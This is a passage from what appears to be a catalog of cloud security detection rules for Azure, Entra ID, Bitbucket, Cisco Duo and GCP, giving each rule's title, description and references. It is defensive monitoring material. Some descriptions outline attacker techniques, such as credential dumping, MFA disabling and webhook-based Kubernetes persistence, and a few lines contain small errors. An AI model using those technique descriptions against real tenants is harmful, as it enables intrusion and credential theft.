Identifies when a service account is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes, https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/, https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/, https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1, https://attack.mitre.org/matrices/enterprise/cloud/ |
Disabled MFA to Bypass Authentication Mechanisms |
Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms. |
https://learn.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates |
Azure Network Firewall Policy Modified or Deleted |
Identifies when a Firewall Policy is Modified or Deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Point-to-site VPN Modified or Deleted |
Identifies when a Point-to-site VPN is Modified or Deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Firewall Rule Configuration Modified or Deleted |
Identifies when a Firewall Rule Configuration is Modified or Deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Network Security Configuration Modified or Deleted |
Identifies when a network security configuration is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Virtual Network Device Modified or Deleted |
Identifies when a virtual network device is being modified or deleted.
This can be a network interface, network virtual appliance, virtual hub, or virtual router.
|
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure New CloudShell Created |
Identifies when a new cloudshell is created inside of Azure portal. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Owner Removed From Application or Service Principal |
Identifies when a owner is was removed from a application or service principal in Azure. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy |
Rare Subscription-level Operations In Azure |
Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used. |
https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml |
Azure Service Principal Created |
Identifies when a service principal is created in Azure. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy |
Azure Service Principal Removed |
Identifies when a service principal was removed in Azure. |
https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities#application-proxy |
Azure Subscription Permission Elevation Via ActivityLogs |
Detects when a user has been elevated to manage all Azure Subscriptions.
This change should be investigated immediately if it isn't planned.
This setting could allow an attacker access to Azure subscriptions in your environment.
|
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization |
Azure Suppression Rule Created |
Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure Virtual Network Modified or Deleted |
Identifies when a Virtual Network is modified or deleted in Azure. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
Azure VPN Connection Modified or Deleted |
Identifies when a VPN connection is modified or deleted. |
https://learn.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations |
CA Policy Removed by Non Approved Actor |
Monitor and alert on conditional access changes where non approved actor removed CA Policy. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access |
CA Policy Updated by Non Approved Actor |
Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare "old" vs "new" value. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access |
New CA Policy by Non-approved Actor |
Monitor and alert on conditional access changes. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure |
Bitlocker Key Retrieval |
Monitor and alert for Bitlocker key retrieval. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval |
Account Created And Deleted Within A Close Time Frame |
Detects when an account was created and deleted in a short period of time. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts |
Certificate-Based Authentication Enabled |
Detects when certificate based authentication has been enabled in an Azure Active Directory tenant. |
https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f, https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/ |
Changes to Device Registration Policy |
Monitor and alert for changes to the device registration policy. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy |
Guest Users Invited To Tenant By Non Approved Inviters |
Detects guest users being invited to tenant by non-approved inviters |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins |
New Root Certificate Authority Added |
Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication. |
https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f, https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/ |
Users Added to Global or Device Admin Roles |
Monitor and alert for users added to device admin roles. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-administrator-roles |
Application AppID Uri Configuration Changes |
Detects when a configuration change is made to an applications AppID URI. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed |
Added Credentials to Existing Application |
Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials |
Delegated Permissions Granted For All Users |
Detects when highly privileged delegated permissions are granted on behalf of all users |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions |
End User Consent |
Detects when an end user consents to an application |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-consent |
End User Consent Blocked |
Detects when end user consent is blocked due to risk-based consent. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent |
Added Owner To Application |
Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner |
App Granted Microsoft Permissions |
Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions |
App Granted Privileged Delegated Or App Permissions |
Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions |
App Assigned To Azure RBAC/Microsoft Entra Role |
Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role |
Application URI Configuration Changes |
Detects when a configuration change is made to an applications URI.
URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes |
Windows LAPS Credential Dump From Entra ID |
Detects when an account dumps the LAPS password from Entra ID. |
https://twitter.com/NathanMcNulty/status/1785051227568632263, https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/, https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487 |
Change to Authentication Method |
Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Azure Domain Federation Settings Modified |
Identifies when an user or application modified the federation settings on the domain. |
https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes |
User Added To Group With CA Policy Modification Access |
Monitor and alert on group membership additions of groups that have CA policy modification access |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access |
User Removed From Group With CA Policy Modification Access |
Monitor and alert on group membership removal of groups that have CA policy modification access |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access |
Guest User Invited By Non Approved Inviters |
Detects when a user that doesn't have permissions to invite a guest user attempts to invite one. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor |
User State Changed From Guest To Member |
Detects the change of user type from "Guest" to "Member" for potential elevation of privilege. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins |
PIM Approvals And Deny Elevation |
Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
PIM Alert Setting Changes To Disabled |
Detects when PIM alerts are set to disabled. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
Changes To PIM Settings |
Detects when changes are made to PIM roles |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
User Added To Privilege Role |
Detects when a user is added to a privileged role. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
Bulk Deletion Changes To Privileged Account Permissions |
Detects when a user is removed from a privileged role. Bulk changes should be investigated. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment |
Privileged Account Creation |
Detects when a new admin is created. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts |
Azure Subscription Permission Elevation Via AuditLogs |
Detects when a user has been elevated to manage all Azure Subscriptions.
This change should be investigated immediately if it isn't planned.
This setting could allow an attacker access to Azure subscriptions in your environment.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation |
Temporary Access Pass Added To An Account |
Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts |
User Risk and MFA Registration Policy Updated |
Detects changes and updates to the user risk and MFA registration policy.
Attackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence.
|
https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy, https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities |
Multi Factor Authentication Disabled For User Account |
Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled".
Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.
|
https://www.sans.org/blog/defending-against-scattered-spider-and-the-com-with-cybercrime-intelligence/ |
Password Reset By User Account |
Detect when a user has reset their password in Azure AD |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Anomalous Token |
Indicates that there are abnormal characteristics in the token such as an unusual token lifetime or a token that is played from an unfamiliar location. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-token, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Anomalous User Activity |
Indicates that there are anomalous patterns of behavior like suspicious changes to the directory. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anomalous-user-activity, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Activity From Anonymous IP Address |
Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#activity-from-anonymous-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Anonymous IP Address |
Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN. |
https://learn.microsoft.com/en-us/graph/api/resources/riskdetection?view=graph-rest-1.0, https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#anonymous-ip-address |
Atypical Travel |
Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Impossible Travel |
Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#impossible-travel, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Suspicious Inbox Forwarding Identity Protection |
Indicates suspicious rules such as an inbox rule that forwards a copy of all emails to an external address |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-forwarding, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Suspicious Inbox Manipulation Rules |
Detects suspicious rules that delete or move messages or folders are set on a user's inbox. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Azure AD Account Credential Leaked |
Indicates that the user's valid credentials have been leaked. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Malicious IP Address Sign-In Failure Rate |
Indicates sign-in from a malicious IP address based on high failure rates. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Malicious IP Address Sign-In Suspicious |
Indicates sign-in from a malicious IP address known to be malicious at time of sign-in. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malicious-ip-address, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Sign-In From Malware Infected IP |
Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#malware-linked-ip-address-deprecated, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Password Spray Activity |
Indicates that a password spray attack has been successfully performed. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#password-spray, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Primary Refresh Token Access Attempt |
Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Suspicious Browser Activity |
Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#suspicious-browser, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Azure AD Threat Intelligence |
Indicates user activity that is unusual for the user or consistent with known attack patterns. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in, https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
SAML Token Issuer Anomaly |
Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
New Country |
Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Unfamiliar Sign-In Properties |
Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins. |
https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties, https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins |
Stale Accounts In A Privileged Role |
Identifies when an account hasn't signed in during the past n number of days. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role |
Invalid PIM License |
Identifies when an organization doesn't have the proper license for PIM and is out of compliance. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance |
Roles Assigned Outside PIM |
Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management |
Roles Activation Doesn't Require MFA |
Identifies when a privilege role can be activated without performing mfa. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation |
Roles Activated Too Frequently |
Identifies when the same privilege role has multiple activations by the same user. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently |
Roles Are Not Being Used |
Identifies when a user has been assigned a privilege role and are not using that role. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles |
Too Many Global Admins |
Identifies an event where there are there are too many accounts assigned the Global Administrator role. |
https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators |
Account Lockout |
Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Successful Authentications From Countries You Do Not Operate Out Of |
Detect successful authentications from countries you do not operate out of. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts |
Increased Failed Authentications Of Any Type |
Detects when sign-ins increased by 10% or greater. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins |
Measurable Increase Of Successful Authentications |
Detects when successful sign-ins increased by 10% or greater. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins |
Authentications To Important Apps Using Single Factor Authentication |
Detect when authentications to important application(s) only required single-factor authentication |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts |
Discovery Using AzureHound |
Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication. |
https://github.com/BloodHoundAD/AzureHound |
Failed Authentications From Countries You Do Not Operate Out Of |
Detect failed authentications from countries you do not operate out of. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts |
Device Registration or Join Without MFA |
Monitor and alert for device registration or join events where MFA was not performed. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy |
Azure AD Only Single Factor Authentication Required |
Detect when users are authenticating without MFA being required. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts |
Suspicious SignIns From A Non Registered Device |
Detects risky authentication from a non AD registered device without MFA being required. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in |
Sign-ins from Non-Compliant Devices |
Monitor and alert for sign-ins where the device was non-compliant. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in |
Sign-ins by Unknown Devices |
Monitor and alert for Sign-ins by unknown devices from non-Trusted locations. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in |
Potential MFA Bypass Using Legacy Client Authentication |
Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack. |
https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022, https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/ |
Application Using Device Code Authentication Flow |
Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.
If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.
This can be a misconfigured application or potentially something malicious.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows |
Applications That Are Using ROPC Authentication Flow |
Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.
The application then uses those credentials to authenticate the user against the identity provider.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows |
Account Disabled or Blocked for Sign in Attempts |
Detects when an account is disabled or blocked for sign in but tried to log in |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts |
Sign-in Failure Due to Conditional Access Requirements Not Met |
Define a baseline threshold for failed sign-ins due to Conditional Access failures |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts |
Use of Legacy Authentication Protocols |
Alert on when legacy authentication has been used on an account |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts |
Login to Disabled Account |
Detect failed attempts to sign in to disabled accounts. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Multifactor Authentication Denied |
User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account. |
https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ |
Azure Unusual Authentication Interruption |
Detects when there is a interruption in the authentication process. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Multifactor Authentication Interrupted |
Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. |
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Users Authenticating To Other Azure AD Tenants |
Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants. |
https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins |
User Access Blocked by Azure Conditional Access |
Detect access has been blocked by Conditional Access policies.
The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.
|
https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts |
Bitbucket Full Data Export Triggered |
Detects when full data export is attempted. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html |
Bitbucket Global Permission Changed |
Detects global permissions change activity. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html |
Bitbucket Global Secret Scanning Rule Deleted |
Detects Bitbucket global secret scanning rule deletion activity. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket Global SSH Settings Changed |
Detects Bitbucket global SSH access configuration changes. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html |
Bitbucket Audit Log Configuration Updated |
Detects changes to the bitbucket audit log configuration. |
https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html |
Bitbucket Project Secret Scanning Allowlist Added |
Detects when a secret scanning allowlist rule is added for projects. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket Secret Scanning Exempt Repository Added |
Detects when a repository is exempted from secret scanning feature. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket Secret Scanning Rule Deleted |
Detects when secret scanning rule is deleted for the project or repository. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket Unauthorized Access To A Resource |
Detects unauthorized access attempts to a resource. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html |
Bitbucket Unauthorized Full Data Export Triggered |
Detects when full data export is attempted an unauthorized user. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html |
Bitbucket User Details Export Attempt Detected |
Detects user data export activity. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts |
Bitbucket User Login Failure |
Detects user authentication failure events.
Please note that this rule can be noisy and it is recommended to use with correlation based on "author.name" field.
|
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html |
Bitbucket User Login Failure Via SSH |
Detects SSH user login access failures.
Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.
|
https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html, https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html |
Bitbucket User Permissions Export Attempt |
Detects user permission data export attempt. |
https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html, https://confluence.atlassian.com/bitbucketserver/users-and-groups-776640439.html |
Cisco Duo Successful MFA Authentication Via Bypass Code |
Detects when a successful MFA authentication occurs due to the use of a bypass code.
A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.
|
https://duo.com/docs/adminapi#logs, https://help.duo.com/s/article/6327?language=en_US |
GCP Access Policy Deleted |
Detects when an access policy that is applied to a GCP cloud resource is deleted.
An adversary would be able to remove access policies to gain access to a GCP cloud resource.
|
https://cloud.google.com/access-context-manager/docs/audit-logging, https://cloud.google.com/logging/docs/audit/understanding-audit-logs, https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog |
GCP Break-glass Container Workload Deployed |
Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.
|
https://cloud.google.com/binary-authorization |
Google Cloud Storage Buckets Enumeration |
Detects when storage bucket is enumerated in Google Cloud. |
https://cloud.google.com/storage/docs/json_api/v1/buckets |
Google Cloud Storage Buckets Modified or Deleted |
Detects when storage bucket is modified or deleted in Google Cloud. |
https://cloud.google.com/storage/docs/json_api/v1/buckets |
Google Cloud Re-identifies Sensitive Information |
Identifies when sensitive information is re-identified in google Cloud. |
https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify |
Google Cloud DNS Zone Modified or Deleted |
Identifies when a DNS Zone is modified or deleted in Google Cloud. |
https://cloud.google.com/dns/docs/reference/v1/managedZones |
Google Cloud Firewall Modified or Deleted |
Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). |
https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging, https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html |
Google Full Network Traffic Packet Capture |
Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. |
https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging, https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html |
Google Cloud Kubernetes Admission Controller |
Identifies when an admission controller is executed in GCP Kubernetes.
A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.
The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.
An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.
For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.
An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
|
https://cloud.google.com/kubernetes-engine/docs |
Google Cloud Kubernetes CronJob |
Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.
Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.
An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.
|
https://cloud.google.com/kubernetes-engine/docs, https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/, https://kubernetes.io/docs/concepts/workloads/controllers/job/ |
Google Cloud Kubernetes RoleBinding |
Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding. |
https://github.com/elastic/detection-rules/pull/1267, https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole, https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control, https://kubernetes.io/docs/reference/access-authn-authz/rbac/, https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging |
Google Cloud Kubernetes Secrets Modified or Deleted |
Identifies when the Secrets are Modified or Deleted. |
https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging |
Google Cloud Service Account Disabled or Deleted |
Identifies when a service account is disabled or deleted in Google Cloud. |
https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts |
Google Cloud Service Account Modified |
Identifies when a service account is modified in Google Cloud. |
